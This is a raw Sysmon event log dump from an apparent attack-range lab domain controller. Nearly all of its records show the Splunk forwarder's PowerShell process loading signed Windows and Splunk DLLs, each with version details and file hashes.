13:06:49.171{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.171{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000100707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.109{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEE150DD93EC575D59F06C546EFE0699,SHA256=AA5F7114C44C0120D6553C42D051CDEDE72666C0AAB533E022E46F4E414FDA48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 
734700x8000000000000000100702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 
734700x8000000000000000100692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft 
Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x8000000000000000100671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 
734700x8000000000000000100668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x8000000000000000100666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:49.031{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 